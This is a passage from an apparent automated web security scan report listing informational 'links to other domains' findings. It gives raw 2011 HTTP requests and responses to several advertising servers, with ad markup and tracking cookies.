GET /adi/N3941.InviteMedia/B5414127.32;sz=160x600;pc=[TPAS_ID];click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BNedOXxG-Te_sHMeXmgfvluHyCq3mhMIBhcPSjhf9072UVwAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi00Njc1MzY0ODUyMTA5MDg4oAGrl7rtA7IBEXd3dy5ncmVlbmh1bGsubmV0ugEKMTYweDYwMF9hc8gBCdoBSGh0dHA6Ly93d3cuZ3JlZW5odWxrLm5ldC9mb3J1bXMvc2hvd3RocmVhZC5waHA_MTI2Mjg1LVJlYXItYm9hcmRpbmctc3RlcJgCyAbAAgXIApWysAuoAwHoA_QI6AORAugDL-gDFPUDAAEAxIAG_9qsrNmGuekT&num=1&sig=AGiWqtxGm_6Saz9O7PUXbCqI4ekaKkw5Fg&client=ca-pub-4675364852109088&adurl=http%3A%2F%2Fva.px.invitemedia.com%2Fpixel%3FreturnType%3Dredirect%26key%3DClick%26message%3DeJyrVjI2VrJSMDI1NDLTUVAyNgJyTC0NjcxNgTxDIEcpJMkkKKLc0cMv18LbNL_Moygnwyep3NZWCaQcpKA0LzsvvzwPxAfpNgHSpiAjjcwMgUwTIDOvNCcHyDQDMs2MLCwtawFithu3%26redirectURL%3D;ord=Tb4RXwAHNm8K5ovHrlhLbw==? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4675364852109088&output=html&h=600&slotname=7606683569&w=160&lmt=1304337917&flash=10.2.154&url=http%3A%2F%2Fwww.greenhulk.net%2Fforums%2Fshowthread.php%3F126285-Rear-boarding-step&dt=1304319912584&bpp=8&shv=r20110427&jsv=r20110427&prev_slotnames=8870801362%2C8870801362&correlator=1304319912561&frm=0&adk=645557951&ga_vid=1539471416.1304319910&ga_sid=1304319910&ga_hid=984664005&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=1025&bih=903&fu=0&ifi=3&dtd=5628&xpc=DefJdIvudC&p=http%3A//www.greenhulk.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1672981/717726/15092,1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 02 May 2011 02:25:34 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 8795

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
<!-- Code auto-generated on Fri Apr 29 11:56:20 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
wPxAfpNgHSpiAjjcwMgUwTIDOvNCcHyDQDMs2MLCwtawFithu3%26redirectURL%3Dhttp%3a%2f%2fwww.tdameritrade.com/offer/250freetrades/%3Fa%3DNVX%26o%3D199%26cid%3DGENRET%3B877237%3B62578498%3B239944784%3B41336049"><img src="http://s0.2mdn.net/1620481/td_ret250_fee_statement_160x600.gif" width="160" height="600" border="0" alt="Advertisement" galleryimg="no"></a></noscript>
<script src="http://cdn.doubleverify.com/script308.js?agnc=930213&cmp=5414127&crt=&crtname=&adnet=&dvtagver=3.3.1346.2176&adsrv=1&plc=62578498&advid=1620481&sid=877237&adid="></script>
...[SNIP]...

23.8. http://ad.doubleclick.net/adj/wpni.jobs/front

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/wpni.jobs/front

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /adj/wpni.jobs/front;sz=160x600,300x250,300x600,336x850;pos=ad6;poe=yes;ad=ss;ad=bb;ad=hp;del=js;ajax=n;heavy=y;pageId=wpni-wl-jobs-home;fromrss=n;rss=n;front=n;tile=3;ord=29166153864935040? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.washingtonpost.com/wl/jobs/home?wpsrc=AG0002174&keyword=4846831919&cre=430450907&g=1&s_kwcid=TC-21380-4846831919-e-430450907
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1672981/717726/15092,1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 01 May 2011 23:33:37 GMT
Expires: Sun, 01 May 2011 23:38:37 GMT
Content-Length: 416

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3afa/0/0/%2a/k;240270553;0-0;0;5742660;10408-336/850;41834567/41852354/1;;~okv=;sz=160x600,300x250,300x600,336x850;pos=ad6;poe=yes;ad=ss;ad=bb;ad=hp;del=js;ajax=n;heavy=y;pageId=wpni-wl-jobs-home;~aopt=2/1/ff/1;~sscs=%3fhttp://iedm.cua.edu/"><img src="http://s0.2mdn.net/viewad/409205/final_WP2_v2.gif" border=0 alt="Click here!"></a>
...[SNIP]...

23.9. http://ad.doubleclick.net/adj/wpni.jobs/front

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/wpni.jobs/front

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /adj/wpni.jobs/front;sz=150x60;pos=150x60;poe=yes;ad=150x60;del=js;ajax=n;heavy=y;pageId=wpni-wl-jobs-home;fromrss=n;rss=n;front=n;tile=2;ord=29166153864935040? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.washingtonpost.com/wl/jobs/home?wpsrc=AG0002174&keyword=4846831919&cre=430450907&g=1&s_kwcid=TC-21380-4846831919-e-430450907
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1672981/717726/15092,1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 01 May 2011 23:33:34 GMT
Expires: Sun, 01 May 2011 23:38:34 GMT
Content-Length: 350

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3afa/0/0/%2a/u;44306;0-0;0;5742660;135-150/60;0/0/0;;~okv=;sz=150x60;pos=150x60;poe=yes;ad=150x60;del=js;ajax=n;heavy=y;pageId=wpni-wl-jobs-home;fromrss=n;rss=n;~aopt=2/1/ff/1;~sscs=%3f"><img src="http://s0.2mdn.net/viewad/817-grey.gif" border=0 alt="Click here!"></a>
...[SNIP]...

23.10. http://ad.yieldmanager.com/iframe3

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /iframe3?WaUDANGUGAASSlUAAAAAALwODwAAAAAAAgEAAAIAAAAAAP8AAAABE5OuAQAAAAAA8yMVAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC9JAIAAAAAAAIAAgAAAAAAHLEWnwIAKEAcsRafAgAoQByxFp8CAChAHLEWnwIAKEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA-dWh0P9IGCuCoJ9BtI0ZMuxgp1sWK95UJMhZwAAAAAA==,http%3A%2F%2Fglobal.ard.yahoo.com%2FSIG%3D15ps83od6%2FM%3D787833.14445110.14291877.12665044%2FD%3Dnews%2FS%3D96654906%3ALREC2%2FY%3DYAHOO%2FEXP%3D1304299983%2FL%3DBZVHFWKIRliKRmeZTatPkQC2rcHW80297a8AAiBt%2FB%3DHqq_KEwNPVs-%2FJ%3D1304292783315180%2FK%3DmbmuBMnyuFXFamzNMr12dQ%2FA%3D6261233%2FR%3D0%2F%2A%24,http%3A%2F%2Fnews.yahoo.com%2Fs%2Fprweb%2F20110427%2Fbs_prweb%2Fprweb5276794,_PVID%3DBZVHFWKIRliKRmeZTatPkQC2rcHW80297a8AAiBt%26Z%3D300x250%26cb%3D1304292783315180%26x%3Dhttp%253A%252F%252Fglobal%252Eard%252Eyahoo%252Ecom%252FSIG%253D15ps83od6%252FM%253D787833%252E14445110%252E14291877%252E12665044%252FD%253Dnews%252FS%253D96654906%253ALREC2%252FY%253DYAHOO%252FEXP%253D1304299983%252FL%253DBZVHFWKIRliKRmeZTatPkQC2rcHW80297a8AAiBt%252FB%253DHqq%255FKEwNPVs%252D%252FJ%253D1304292783315180%252FK%253DmbmuBMnyuFXFamzNMr12dQ%252FA%253D6261233%252FR%253D0%252F%252A%2524%26S%3D14445110%26i%3D140477%26D%3Dzip%253D05672%2526ycg%253D%2526yyob%253D%26_salt%3D3283334435%26B%3D10%26u%3Dhttp%253A%252F%252Fnews.yahoo.com%252Fs%252Fprweb%252F20110427%252Fbs_prweb%252Fprweb5276794%26r%3D0,65973c16-744b-11e0-a09d-003048d6d2fe HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/st?_PVID=BZVHFWKIRliKRmeZTatPkQC2rcHW80297a8AAiBt&ad_type=iframe&ad_size=300x250&site=140477&section_code=14445110&cb=1304292783315180&yud=zip%3D05672%26ycg%3D%26yyob%3D&pub_redirect_unencoded=1&pub_redirect=http://global.ard.yahoo.com/SIG=15ps83od6/M=787833.14445110.14291877.12665044/D=news/S=96654906:LREC2/Y=YAHOO/EXP=1304299983/L=BZVHFWKIRliKRmeZTatPkQC2rcHW80297a8AAiBt/B=Hqq_KEwNPVs-/J=1304292783315180/K=mbmuBMnyuFXFamzNMr12dQ/A=6261233/R=0/*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=888a2c66-6932-11e0-8830-001b24783b20&_hmacv=1&_salt=4113190855&_keyid=k1&_hmac=2bd08a6ff17f1fdebe5379daa4d53c1f64bef7b8; pv1="b!!!!$!#M*E!,Y+@!$Xwq!/h[p!%:3<!!!!$!?5%!(/4f4!w1K*!%4fo!'i8L!'>d6~~~~~<vl)[<wjgu~!#3yC!,Y+@!$Xwq!1`)_!%bq`!!!!$!?5%!$U=A2!w1K*!%4fo!$k7.!'pCX~~~~~<wYiT=#mS_~"; ih="b!!!!2!)Tt+!!!!#<wYoD!)`Tm!!!!#<vmX7!)`Tq!!!!#<vmX5!)`U6!!!!#<vmX0!*loT!!!!#<vl)_!/Iw4!!!!#<wF]1!/_KY!!!!#<vl)T!/h[p!!!!#<vl)[!/iq6!!!!$<vmX=!/iq@!!!!$<vm`!!/iqB!!!!#<vmTN!/iqH!!!!#<vmTH!1EYJ!!!!#<wUv<!1M!9!!!!$<wF]9!1`)_!!!!#<wYiT"; bh="b!!!$-!!!?H!!!!%<wR0_!!-?2!!!!#<xG3/!!-G2!!!!$<w[UB!!-yu!!!!.<vm`$!!.+B!!!!.<vm`%!!.tS!!!!#<xG3/!!0P,!!!!#<x4hf!!1Mv!!!!#<waw+!!2(j!!!!/<whqI!!4Qs!!!!%<wle3!!J<=!!!!)<wYiT!!J<E!!!!)<wYiT!!J>I!!!!#<x)TA!!L(^!!!!$<xD>X!!LHY!!!!.<whoV!!L[f!!!!#<wYl+!!ONX!!!!#<wle$!!ObA!!!!'<xG3/!!PL`!!!!#<x@jG!!RZ(!!!!$<xD>X!!VQ(!!!!#<wYkr!!dNP!!!!%<x+rS!!g5o!!!!'<wsq+!!iV_!!!!%<wsq-!!i[%!!!!#<x4hf!!ita!!!!*<wYiT!!q:E!!!!'<wYiT!!q<+!!!!(<wYiT!!q</!!!!(<wYiT!!q<3!!!!(<wYiT!!r^4!!!!(<x+rV!!r^5!!!!#<x*ig!!tjQ!!!!$<xG3/!!wcu!!!!#<xCAG!!wq:!!!!#<xCAF!!xX$!!!!#<x(sS!!xX+!!!!#<x(rt!##^t!!!!#<wYoF!#'uj!!!!#<wsgD!#*Xc!!!!#<xE(*!#+<r!!!!#<wO:5!#+di!!!!#<xYi<!#+dj!!!!#<xYi<!#+dk!!!!#<xYi<!#-B#!!!!#<wsXA!#-H0!!!!#<wleD!#.dO!!!!'<xD>X!#27)!!!!+<x+rW!#2RS!!!!#<x9#3!#2Rn!!!!#<x2wq!#2YX!!!!#<vl)_!#3>J!!!!#<x(U)!#3g6!!!!#<w>/l!#3pS!!!!#<x31-!#3pv!!!!#<wsXA!#4`K!!!!#<x2wq!#5(U!!!!#<x,:<!#5(V!!!!#<x31-!#5(W!!!!#<x3.t!#5([!!!!#<x,:<!#5(^!!!!#<x31-!#5(a!!!!#<x3.t!#5[N!!!!#<vl)_!#5kt!!!!#<x)TA!#6U!!!!!#<x,:<!#8>*!!!!#<x2wq!#8Mo!!!!#<wle%!#8tG!!!!#<wsq,!#=-g!!!!#<xi5p!#L]q!!!!#<w>/s!#MHv!!!!$<w>/n!#MTK!!!!#<w>/m!#M]c!!!!$<xD>X!#Mr7!!!!#<w>/l!#N44!!!!#<x2wq!#SCj!!!!'<xD>X!#SCk!!!!'<xD>X!#SEm!!!!)<wYiT!#SF3!!!!)<wYiT!#T,d!!!!#<wsXA!#T8R!!!!#<x+I0!#UDP!!!!)<wYiT!#U_(!!!!*<wleI!#V7#!!!!#<x,:<!#VEP!!!!#<wleE!#XI8!!!!#<xL%*!#YCg!!!!#<x2wq!#[L>!!!!%<w[UA!#]%`!!!!#<w<@B!#]@s!!!!%<whqH!#^@9!!!!#<x2wq!#^bt!!!!$<xD>X!#^d6!!!!#<w<@B!#_0B!!!!#<xE(*!#`S2!!!!'<xG3/!#a'?!!!!#<w>/m!#aCq!!!!
(<w[U@!#aG>!!!!'<xD>X!#b.n!!!!#<xE(*!#b:Z!!!!#<x2wq!#b<Z!!!!#<x3.t!#b<_!!!!#<x3.t!#b<`!!!!#<x,:<!#b<a!!!!#<x,:<!#b<m!!!!#<x3.t!#b='!!!!#<x3.t!#b=(!!!!#<x,:<!#b=*!!!!#<x,:<!#b=E!!!!#<x31-!#b=F!!!!#<x3.t!#b=G!!!!#<x3.t!#b?y!!!!#<xE(*!#b@%!!!!#<wsXA!#c%+!!!!#<xE(*!#c-u!!!!-<w*F]!#ddE!!!!#<xYi>!#e(g!!!!#<xE(*!#eaO!!!!'<xD>X!#ec)!!!!%<x+rF!#g]5!!!!)<xdAS!#gsr!!!!#<x2wq!#k]4!!!!#<x2wq!#mP5!!!!$<w[UB!#mP6!!!!$<w[UB!#ni8!!!!#<x*cS!#p6E!!!!%<wleK!#p6Z!!!!#<wle8!#p]R!!!!#<wsXA!#p]T!!!!#<wsXA!#q),!!!!#<wO:5!#q2T!!!!.<whoV!#q2U!!!!.<whoV!#q9]!!!!#<waw+!#qx3!!!!#<wGkF!#qx4!!!!#<wGk*!#r:A!!!!#<waw,!#r<X!!!!#<x+I@!#sAb!!!!#<x3XJ!#sAc!!!!#<x3XJ!#sC4!!!!#<x3XJ!#sax!!!!#<xd-C!#uE=!!!!#<x9#K!#uJY!!!!)<wYiT!#ust!!!!'<xD>X!#usu!!!!'<xD>X!#v,Y!!!!#<x2wq!#w!v!!!!#<wsXA!#wGj!!!!#<wle$!#wGm!!!!#<wle$!#wW9!!!!'<xD>X!#wnK!!!!$<xD>X!#wnM!!!!$<xD>X!#xI*!!!!'<xD>X!#xIF!!!!%<wYiT!#xPu~~!#yM#!!!!'<xD>X!#yX.!!!!9<w*F[!$!:w!!!!#<x2wq!$!>x!!!!*<wjBg!$#3q!!!!(<x+Z1!$#WA!!!!'<xD>X!$$K<!!!!$<wleJ!$$L.!!!!#<w[Sh!$$L/!!!!#<w[Sh!$$L0!!!!#<w[Sh!$$LE!!!!#<w[_a!$$LL!!!!$<w[_f!$$j2!!!!#<xKwk!$$p*!!!!#<wUv4!$%,!!!!!'<xD>X!$%,J!!!!#<x2wq!$%SB!!!!'<xD>X!$%Uy!!!!#<w>/l!$'/1!!!!#<wx=%!$(!P!!!!%<xG3/!$(+N!!!!#<wGkB!$(Gt!!!!%<wYiT!$(V0!!!!$<xj^Z!$)DI!!!!#<x2wq!$*R!!!!!$<xD>X"; BX=8khj7j56qmjsh&b=4&s=dk&t=106

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:34:09 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
X-RightMedia-Hostname: ad0418.2rm.ac4
Set-Cookie: ih="b!!!!3!)Tt+!!!!#<wYoD!)`Tm!!!!#<vmX7!)`Tq!!!!#<vmX5!)`U6!!!!#<vmX0!*loT!!!!#<vl)_!,+Z*!!!!#<xjve!/Iw4!!!!#<wF]1!/_KY!!!!#<vl)T!/h[p!!!!#<vl)[!/iq6!!!!$<vmX=!/iq@!!!!$<vm`!!/iqB!!!!#<vmTN!/iqH!!!!#<vmTH!1EYJ!!!!#<wUv<!1M!9!!!!$<wF]9!1`)_!!!!#<wYiT"; path=/; expires=Tue, 30-Apr-2013 23:34:09 GMT
Set-Cookie: vuday1=Ajz6%!?-x!@eJsf; path=/; expires=Mon, 02-May-2011 00:00:00 GMT
Set-Cookie: pv1="b!!!!%!#3yC!,Y+@!$Xwq!1`)_!%bq`!!!!$!?5%!$U=A2!w1K*!%4fo!$k7.!'pCX~~~~~<wYiT=#mS_~!!J<[!!E)$!$XwM!,+Z*!#WUS!!!%%!?5%!),1*7!ZmB)!!28h!$8eP~~~~~~<xjve<y+o`M.jTN!!L7_!!E)$!$XwM!,+Z*!#WUS!!!%%!?5%!),1*7!ZmB)!!28h!$8eP~~~~~~<xjve<yi^'M.jTN"; path=/; expires=Tue, 30-Apr-2013 23:34:09 GMT
Set-Cookie: BX=8khj7j56qmjsh&b=4&s=dk&t=106; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT
Set-Cookie: liday1=t07yR!?-x!TDjBo; path=/; expires=Mon, 02-May-2011 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Sun, 01 May 2011 23:34:09 GMT
Pragma: no-cache
Content-Length: 1185
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(5589522);}
</script><IFRAME SRC="http://ad.doubleclick.net/adi/N3175.153731.YAHOOINC.NETWORK-PR/B4640114.11;sz=300x250;dcopt=rcl;mtfIFPath=nofile;click=http://ads.bluelithium.com/clk?2,13%3B19a34308c4f95403%3B12fade9770a,0%3B%3B%3B3981257725,WaUDANGUGAASSlUAAAAAALwODwAAAAAAAgEAAAIAAAAAAP8AAAABE5OuAQAAAAAA8yMVAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC9JAIAAAAAAAIAAgAAAAAACXfprS8BAAAAAAAAADY1OTczYzE2LTc0NGItMTFlMC1hMDlkLTAwMzA0OGQ2ZDJmZQA4nyoAAAA=,http%3A%2F%2Fglobal.ard.yahoo.com%2FSIG%3D15ps83od6%2FM%3D787833.14445110.14291877.12665044%2FD%3Dnews%2FS%3D96654906%3ALREC2%2FY%3DYAHOO%2FEXP%3D1304299983%2FL%3DBZVHFWKIRliKRmeZTatPkQC2rcHW80297a8AAiBt%2FB%3DHqq_KEwNPVs-%2FJ%3D1304292783315180%2FK%3DmbmuBMnyuFXFamzNMr12dQ%2FA%3D6261233%2FR%3D0%2F%2A%24,http%3A%2F%2Fnews.yahoo.com%2Fs%2Fprweb%2F20110427%2Fbs_prweb%2Fprweb5276794,;ord=1304292849?" WIDTH=300 HEIGHT=250 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR='#000000'></iframe>
...[SNIP]...

23.11. http://admeld.adnxs.com/usersync

Summary

Severity:   Information
Confidence:   Certain
Host:   http://admeld.adnxs.com
Path:   /usersync

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /usersync?calltype=admeld&admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9&admeld_adprovider_id=193&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: admeld.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www.japanator.com/elephant/signup.phtml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIImdYCEAoYAiACKAIw447n7QQQ447n7QQYAQ..; anj=Kfw))ByDuq(FJl:c9U(O<@CeVOmEXW1hL>#/*4Jn(uor=(5EBh5<W.k)Y><WiS:LOiybjU0r>wWIql]AvGq/IdS!acC(FaP$cYJ!J#h1Y$?7kmw?YIqgimiBWWi-dkyfpjFRO44ek(e!)zV^HsoI@m5(lVJ]-z44hi<@/+Gxw$#QV%Etka*a%eva$=@Au!AJSu6uj*@oO@]EL5n0EQo`R]:t/`eU_45K!c^VKH`O2$i'@`s.wMV-wH9)D=aab*.arK7xs@L$@.CbO?Kb?0ZuKR(FN+u4M#Er2:Iua<E_XvS:>yEy6m-9JBYXUm+V1/.@>oBLAQ/P^+8=*EjA[(GADvf*BbS#E1e?YTKA$'LPYDp0.fkASgZh0i(^P[N`AV7o.$d3BYa-u[VwBx:I(G/:381kcgHWoswb:=`Ku>u@Cidi%Y$u9`qSJ<7rlOS'j/U/>:p6qkC9x[=9>gzl!f)'vJRUdB!F`KgLFB[sgim_V^-4E!hC:TT[Mnnesvth<EqmD]T6X<+EXw*eL#7V._]eR7wKz#+Q<jY0)9m4.Ux(+g2x6gtKj2Uf7bK$d-7jQI=`H%cII=9QVL!LY6%gg!la[qizZ#JNdA3x'%jK#?C9j?>vs79'K>b2_7w$cAnjrNM]; sess=1; uuid2=2724386019227846218

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 03-May-2011 02:10:32 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 31-Jul-2011 02:10:32 GMT; domain=.adnxs.com; HttpOnly
Content-Type: application/x-javascript
Date: Mon, 02 May 2011 02:10:32 GMT
Content-Length: 155

document.write('<img src="http://tag.admeld.com/match?admeld_adprovider_id=193&external_user_id=2724386019227846218&expiration=0" width="0" height="0"/>');

23.12. http://ads-vrx.adbrite.com/adserver/display_iab_ads

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads-vrx.adbrite.com
Path:   /adserver/display_iab_ads

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /adserver/display_iab_ads?sid=1794248&title_color=0000FF&text_color=000000&background_color=fcfaf3&border_color=fcfaf3&url_color=008000&newwin=0&zs=3330305f323530&width=300&height=250&xb=13667710&xbg=12857574&xfb=0&xv=1844495&xat=1&xbt=CpcBidImpl&xc=302e30303131&xe=302e3432&xcc=a4764a3f7ec8a41fd02b6ccdfd0dc845&xdv=false&xg=4b0f5fc0-6071-4bfe-8570-deb210507cbe&xap=0&xaps=0&xfp=BELOW&url=http%3A%2F%2Fwebsiteprice.net%2Fresult%2F%3Fid%3D65934 HTTP/1.1
Host: ads-vrx.adbrite.com
Proxy-Connection: keep-alive
Referer: http://websiteprice.net/result/?id=65934
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362049x0.049+1303083450x544669068"; cv="1%3Aq1ZyLi0uyc91zUtWslIyyU9OqknPLc9PsUitqDFNLbEyLLRITSm1MrayMC%2FPL1WqBQA%3D"; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; srh="1%3Aq64FAA%3D%3D"; b="%3A%3A12gg8%2C12ggb%2C6e73"; rb2=CjQKBjY4NDMzORjljcu5CyIkNGRhYjdkMzUtYjFkMi05MTVhLWQzYzAtOWQ1N2Y5YzY2YjA3CjQKBjcxMTM4NBiI_srNEyIkYzFlMTMwMWUtM2ExZi00Y2E3LTk4NzAtZjYzNmI1ZjEwZTY2CjYKBjc2MjcwMRDg1_T5CRiAk-zNEyIgOTc4OTcyREZBMDYzMDAwRDJDMEU3QTM4MEJGQTFERUMKFAoGNzgyNjA2EIC7iqMKGICT7M0TCjQKBjgwNjIwNRjAyYaZFSIkMGMyYWVkZTYtNmJiNi0xMWUwLThmZTYtMDAyNTkwMGE4ZmZlEAE; ut="1%3AHY5LEoMgEAXvMmsWDEZDeRtQI1YmEMBPqePdg9l29et6J6wK2hPew76F1GdooXNOj1GalTHSOH9YsRXZqN7cwOnMyJJxCVLEWB1bobpKVDSsRVY5IeN3f3nPZYDzITINRMWy8xb4yY2tROeomfbm4Qvu5UJ3EgRY4%2F2Qpv8NuK4f"; vsd=0@4@4dbe1166@websiteprice.net; fq="7l04r%2C1uo0%7Clkjpsr%2C84fok%2C1uo0%7Clkigxp%2C83ol2%2C1uo0%7Clkjpss%2C84y2m%2C1uo0%7Clkjpt2%2C826ke%2C1uo0%7Clkjpsr"; rb=0:684339:20838240:4dab7d35-b1d2-915a-d3c0-9d57f9c66b07:0:711384:20861280:c1e1301e-3a1f-4ca7-9870-f636b5f10e66:0:742697:20828160:2931142961646634775:0:762701:20861280:978972DFA063000D2C0E7A380BFA1DEC:0:782606:20861280::0:806205:20882880:0c2aede6-6bb6-11e0-8fe6-0025900a8ffe:0

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Content-Type: text/html
Connection: close
Server: XPEHb/1.0
Accept-Ranges: none
Date: Mon, 02 May 2011 02:22:39 GMT
Content-Length: 980

<html><head></head><body leftmargin=0 topmargin=0 bgcolor="#FFFFFF"> <!-- eyewonder -->

